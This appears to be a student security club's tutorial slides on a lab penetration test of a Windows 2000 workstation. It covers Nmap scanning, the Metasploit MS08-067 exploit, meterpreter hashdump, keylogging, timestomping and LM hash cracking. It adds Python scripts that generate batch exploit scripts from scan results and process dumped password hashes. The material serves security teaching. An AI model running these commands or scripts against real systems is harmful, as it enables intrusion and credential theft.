Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.

Tonight
Our first "interactive" meeting
Introduction to Backtrack
A mini penetration test: Scenario, Outline, Enumeration, Exploitation, Post Exploitation, Exercise
Summary
Resources

Scenario
Company X wants you to test whether their internal boxes are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

Outline
Enumeration: OS, services, versions, filters
Exploitation: exploit a known vulnerability, get shell access to the box
Post Exploitation: shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot

Enumeration
'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org
nmap [Scan Type(s)] [Options] {target specification}
Scan Types: -sS (SYN), -sT (Connect), -sA (ACK), …
Options: -O (OS detection), -sV (service/version detection), -v (verbose), …
Note: -sS needs raw-socket privileges (run Nmap as root; otherwise it falls back to a full connect scan), and -sA does not find open ports at all: it maps which ports a filter lets through, which is what the "filters" item in the outline is about.

… Enumeration
nmap {target}
    Default scan: SYN (connect scan if not root), top 1000 ports
nmap -v -sV -O -p … {target}
    Verbose, service versions, OS detection, ports 1 through …
nmap -PN --script='smb*' -sV -O {target}
    Don't ping (-PN; current Nmap spells it -Pn), run all smb* NSE scripts, service versions, OS detection
    Quote the script glob so the shell does not expand it against files in the current directory.

Nmap Output
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
...
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
...
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
...
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$
...
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Reading it: the stack fingerprint ("OS details") and the banner guess on 445 ("Windows XP") disagree with what SMB itself reports (Windows 2000); the c:\winnt\ path on 1025 also points to Windows 2000, so the SMB-level answer is the one to trust when picking an exploit target. Anonymous access to IPC$ is what let smb-enum-domains list the users. In current Nmap the smb-check-vulns script has been split into per-issue scripts (smb-vuln-ms08-067 and friends).

Exploitation
Metasploit: Penetration Testing Framework with tools, libraries, modules, and user interfaces
# msfconsole
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST …
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
Notes: current Metasploit names the option RHOSTS. A bind payload opens a new listening port on the target, which is fine for a lab box on the same LAN but is blocked by a host firewall or NAT; the usual alternative is windows/meterpreter/reverse_tcp with LHOST set to your own address.
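The enumeration output and the msfconsole commands above are the two halves of one loop: scan, pick the hosts the NSE check flagged, exploit them. As an added example (not code from the slides or from Nmap/Metasploit), the Python script below parses an Nmap normal-output (-oN) report of the kind shown on the output slide, keeps the stack fingerprint and the SMB-reported OS as separate fields so the disagreement above stays visible, and writes a resource script that replays the exploitation commands for every host where smb-check-vulns said VULNERABLE and 445/tcp is open. msfconsole really does replay such files with `msfconsole -r file.rc`; the report text and the 192.168.56.x addresses are constructed for the example.

```python
"""Turn an Nmap normal-output (-oN) report into a Metasploit resource script.

Added example, not code from the original slides. The sample report below is
constructed; the addresses are lab placeholders.
"""
import re
from dataclasses import dataclass, field

# Host header: "Nmap scan report for ..." (Nmap >= 5.2) or the older
# "Interesting ports on ...:" line.
HOST_RE = re.compile(r"^(?:Nmap scan report for|Interesting ports on)\s+(.+?):?\s*$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
OS_RE = re.compile(r"^OS details:\s*(.+)$")
SMB_OS_RE = re.compile(r"^\|\s*smb-os-discovery:\s*(.+)$")
# NSE vuln lines look like "|_  MS08-067: VULNERABLE" or "|   MS08-067: NOT VULNERABLE"
VULN_RE = re.compile(r"^\|[_ ]*\s*(MS\d{2}-\d{3}):\s*(.+?)\s*$")

MS08_067 = "exploit/windows/smb/ms08_067_netapi"


@dataclass
class Host:
    addr: str
    ports: dict = field(default_factory=dict)   # port -> (service, version)
    os_stack: str = ""                          # TCP/IP stack fingerprint
    os_smb: str = ""                            # what SMB itself reports
    vulns: dict = field(default_factory=dict)   # "MS08-067" -> "VULNERABLE"


def parse_nmap(text):
    """Return one Host per host block in the report."""
    hosts, cur = [], None
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            name = m.group(1)
            if "(" in name:                     # "host (1.2.3.4)" -> keep the address
                name = name[name.index("(") + 1:].rstrip(")")
            cur = Host(name)
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            cur.ports[int(m.group(1))] = (m.group(4), m.group(5).strip())
            continue
        for regex, attr in ((OS_RE, "os_stack"), (SMB_OS_RE, "os_smb")):
            m = regex.match(line)
            if m:
                setattr(cur, attr, m.group(1))
        m = VULN_RE.match(line)
        if m:
            cur.vulns[m.group(1)] = m.group(2).upper()
    return hosts


def ms08_067_targets(hosts):
    """Only hosts where the NSE check said VULNERABLE and 445/tcp is open."""
    return [h for h in hosts
            if h.vulns.get("MS08-067") == "VULNERABLE" and 445 in h.ports]


def resource_script(hosts, payload="windows/meterpreter/bind_tcp"):
    """msfconsole commands per target. RHOST as on the slide (current Metasploit
    spells it RHOSTS); `exploit -j` backgrounds each session so the script
    continues with the next host."""
    lines = []
    for h in ms08_067_targets(hosts):
        lines += [f"use {MS08_067}", f"set RHOST {h.addr}",
                  f"set PAYLOAD {payload}", "exploit -j", ""]
    return "\n".join(lines)


SAMPLE_REPORT = """\
Nmap scan report for 192.168.56.101
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1

Host script results:
| smb-os-discovery: Windows 2000
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.56.102
Not shown: 998 closed ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3

Host script results:
| smb-os-discovery: Windows XP
| smb-check-vulns:
|_  MS08-067: NOT VULNERABLE
"""

if __name__ == "__main__":
    hosts = parse_nmap(SAMPLE_REPORT)
    for h in hosts:
        print(h.addr, "| stack:", h.os_stack, "| smb:", h.os_smb, "| vulns:", h.vulns)
    print(resource_script(hosts))   # only 192.168.56.101 gets an exploit block
```

Save the report with `nmap -oN scan.txt ...`, run the script, redirect the output to `ms08_067.rc` and load it with `msfconsole -r ms08_067.rc`. For anything beyond a lab, parse Nmap's XML (-oX) instead of the human-readable text; the normal-output layout is not a stable interface.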

Post Exploitation
Gather useful information: SSH & GPG keys, hashes, etc...
Pivot
meterpreter > hashdump          dump the LM/NT password hashes from the SAM (needs SYSTEM; MS08-067 lands you there already, otherwise migrate into a SYSTEM process first)
meterpreter > sysinfo           OS, architecture, hostname
meterpreter > keyscan_start | keyscan_dump | keyscan_stop   keylogger in the current process
meterpreter > timestomp         change a file's MACE timestamps
meterpreter > migrate           move the session into another process
meterpreter > shell             drop to a cmd.exe on the target

… Post Exploitation
We dumped the hashes... now what?
Pass the hash: the NT hash authenticates over SMB as-is (Metasploit's psexec module takes LM:NT in SMBPass), no cracking needed
Crack the hash: the cleartext matters when the password is reused elsewhere
John the Ripper: "a tool to find weak passwords of your users"
john [options] password-files
  --wordlist
  --users, --groups
  --session, --restore

… Post Exploitation
john --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s: …  trying: SKIDOO - ZHONGGU
Reading it: "NT LM DES" means John cracked the LM hashes, which uppercase the password and hash each 7-character half independently. That is why everything comes back in capitals, why webmaster's password appears as two halves (BASKETB + ALL), and why Guest's empty line means an empty password. To learn the real case, run a second, case-sensitive pass over the NT hashes using the LM results as a wordlist with case-toggling rules.
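The two post-exploitation slides hand data from meterpreter's hashdump to John and back. As an added example (not code from the slides, from Metasploit or from John), the Python script below does the bookkeeping a practitioner needs in between: it parses the pwdump-style lines hashdump prints (user:rid:LM:NT:::), flags blank passwords and accounts that still have an LM hash stored, writes the input file John expects, then parses John's LM results, joins the :1/:2 halves back into full passwords and expands their case for the NT-hash pass. The hashdump lines are constructed: the Guest entry uses the well-known hashes of the empty password; the other hash values are placeholder hex, not real hashes of the passwords shown.

```python
"""Hash handling between meterpreter's hashdump and John the Ripper.

Added example, not code from the original slides. HASHDUMP is constructed:
Guest carries the real empty-password hashes, the rest is placeholder hex.
"""
import itertools
import re

EMPTY_LM = "aad3b435b51404ee" * 2              # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
NULL_HALF = "aad3b435b51404ee"                 # LM half for an empty 7-char block

# John prints "PASSWORD         (user)" or, for LM halves, "(user:1)" / "(user:2)";
# a blank password leaves the left side empty.
JOHN_RE = re.compile(r"^(.*?)\s*\(([^():\s]+)(?::([12]))?\)\s*$")


def parse_hashdump(lines):
    """user -> {rid, lm, nt, blank, lm_stored, short} from pwdump-format lines."""
    accounts = {}
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        accounts[user] = {
            "rid": rid, "lm": lm, "nt": nt,
            "blank": nt == EMPTY_NT,                   # no password at all
            "lm_stored": lm not in ("", EMPTY_LM),     # LM hash present: cheap to crack
            "short": lm[16:] == NULL_HALF,             # password fits in 7 chars
        }
    return accounts


def john_input(accounts):
    """pwdump lines for the accounts worth cracking (blank passwords skipped)."""
    return "\n".join(f"{u}:{a['rid']}:{a['lm']}:{a['nt']}:::"
                     for u, a in accounts.items() if not a["blank"])


def reassemble_lm(john_output):
    """Join John's LM halves back into full (uppercased) passwords."""
    halves, full = {}, {}
    for line in john_output.splitlines():
        m = JOHN_RE.match(line)
        if not m:
            continue
        pw, user, half = m.groups()
        if half is None:
            full[user] = pw
        else:
            halves.setdefault(user, ["", ""])[int(half) - 1] = pw
    for user, (first, second) in halves.items():
        full[user] = first + second
    return full


def case_candidates(word):
    """Every upper/lower spelling of an LM result, to try against the NT hash."""
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    return ["".join(combo) for combo in itertools.product(*choices)]


HASHDUMP = [  # constructed sample; only Guest's hashes are real (empty password)
    "Administrator:500:11111111111111111111111111111111:22222222222222222222222222222222:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "sally:1001:3333333333333333aad3b435b51404ee:44444444444444444444444444444444:::",
    "webmaster:1002:55555555555555556666666666666666:77777777777777777777777777777777:::",
]

JOHN_OUTPUT = """\
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%
"""

if __name__ == "__main__":
    accounts = parse_hashdump(HASHDUMP)
    for user, a in accounts.items():
        print(f"{user:14} blank={a['blank']} lm_stored={a['lm_stored']} short={a['short']}")
    print(john_input(accounts))
    found = reassemble_lm(JOHN_OUTPUT)
    print(found)                                     # webmaster -> 'BASKETBALL'
    print(len(case_candidates(found["webmaster"])))  # 1024 spellings for the NT pass
```

Write the case candidates to a file and feed it back as `--wordlist` against the NT hashes (`--format=nt` in current John); that second pass is what turns BASKETBALL into the spelling the user actually types. The `short` flag is a free finding on its own: a second LM half equal to aad3b435b51404ee tells you the password is at most seven characters before any cracking starts.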

So... let's get started
Boot up to your Backtrack CD
passwd                          (set a root password first: the live CD ships with a well-known default)
/etc/init.d/networking start
startx
Follow along... let's pwn this box :)

Summary
Clearly... Company X's default user workstations need some work. Now let's do the paperwork!... just joking ;)
Hopefully this gives everyone a hands-on introduction to Backtrack, some essential tools, and the attacker's mindset & process.
We want feedback, please!!!! Feedback will steer this organization!!!!

Resources
utdcsg.org: Forums (please register!), IRC: irc.oftc.net, #utdcsg
Nmap: nmap.org/5/
Metasploit: metasploit.com/
John the Ripper: openwall.com/john/

Thanks
Next meeting: March 24th, 8:30, ECSS
Cracking WPA
ARP spoofing (traffic redirection, password sniffing)